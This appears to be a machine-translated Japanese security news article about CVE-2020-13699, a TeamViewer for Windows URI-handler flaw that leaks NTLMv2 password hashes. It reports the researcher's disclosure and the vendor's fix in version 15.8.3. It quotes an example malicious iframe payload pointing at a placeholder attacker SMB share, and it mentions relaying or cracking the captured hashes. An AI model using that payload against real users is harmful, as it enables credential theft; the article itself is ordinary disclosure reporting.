TeamViewer は最近、ソフトウェアの新バージョンをリリースすることで、Windows 用デスクトップ アプリの高リスクの脆弱性を修正しました。この脆弱性が悪用されると、リモートの攻撃者にシステム パスワードが盗まれ、悪用される可能性があります。
さらに懸念されるのは、この攻撃は被害者の介入を必要とせず、ほぼ自動的に実行できることです。
ご存じない方のために説明すると、TeamViewer はドイツの TeamViewer GmbH によって開発された人気のあるソフトウェア アプリケーションで、リモート コントロール、デスクトップ共有、オンライン会議、Web 会議、コンピュータ間のファイル転送を目的としています。
Microsoft Windows、Linux、macOS、Chrome OS、Android、iOS、Windows RT、Windows Phone 8、および BlackBerry オペレーティング システムで利用できます。 Web ブラウザを使用して TeamViewer を実行しているシステムにアクセスすることもできます。
と呼ばれる深刻な脆弱性CVE-2020-13699ジェフリー・ホフマンによって最初に発見されました。セキュリティ研究者プレトリアンより。研究者によると、この脆弱性は、アプリケーションがカスタム URI を引用する方法 (引用されていない URI ハンドラー) に Windows 版 TeamViewer に存在します。
専門家は、この問題により、攻撃者がソフトウェアに NTLM 認証要求を攻撃者のシステムに中継させる可能性があることを発見しました。つまり、攻撃者は Web ページから TeamViewer の URI スキームを強制的に使用して、被害者のシステムにインストールされているアプリケーションをだまして、攻撃者が所有するリモート SMB 共有への接続を開始させることができます。
これにより SMB 認証プロセスがトリガーされ、システムのユーザー名と NTLMv2 ハッシュ バージョンのパスワードが攻撃者に漏洩します。
CVE 2020-13699 を悪用するには、攻撃者は Web サイトに悪意のある iframe を埋め込み、被害者をだましてその悪意を持って作成された URL にアクセスさせる必要があります。被害者がリンクをクリックすると、TeamViewer が自動的に Windows デスクトップ クライアントを起動し、リモート SMB 共有を開きます。
「攻撃者は、細工した URL (iframe src='teamviewer10: –play \\attacher-IP\share\fake.tvs') を使用して Web サイトに悪意のある iframe を埋め込み、TeamViewer Windows デスクトップ クライアントを起動して強制的に開く可能性があります。リモート SMB 共有」説明したジェフリー・ホフマン氏の勧告。
「Windows は SMB 共有を開くときに NTLM 認証を実行し、その要求は (レスポンダーなどのツールを使用して) コード実行のために中継されます (またはハッシュ クラッキングのためにキャプチャされます)。」
この脆弱性は、「URI ハンドラー Teamviewer10、teamviewer8、teamviewerapi、tvchat1、tvcontrol1、tvfiletransfer1、tvjoinv8、tvpresent1、tvsendfile1、tvsqcustomer1、tvsqsupport1、tvvideocall1、tvvpn1」に影響します。ホフマン氏はこう語った。。
この脆弱性の公開を受けて、TeamViewer プロジェクトは、影響を受ける URI ハンドラーによって渡されるパラメーター (URL:teamviewer10 プロトコル "C:\Program Files (x86)\TeamViewer\TeamViewer.exe" "%1" など) を引用することによって欠陥を修正しました。
この欠陥を修正するために、「CVE 2020-13699 に関連する URI 処理のいくつかの改善を実装しました」と TeamViewer は記事で述べています。声明。 「プレトリアンのジェフリー・ホフマン氏、プロフェッショナリズムと責任ある情報開示モデルに従っていただきありがとうございます。ご連絡いただき、最新リリースで調査結果の修正を確認していただけたことに感謝いたします。」
この問題に対処するために、TeamViewer はバージョン 15.8.3 をリリースし、ユーザーにこのバージョンに直ちにアップグレードすることを推奨しています。
こちらもお読みください-Teamviewer の最良の代替品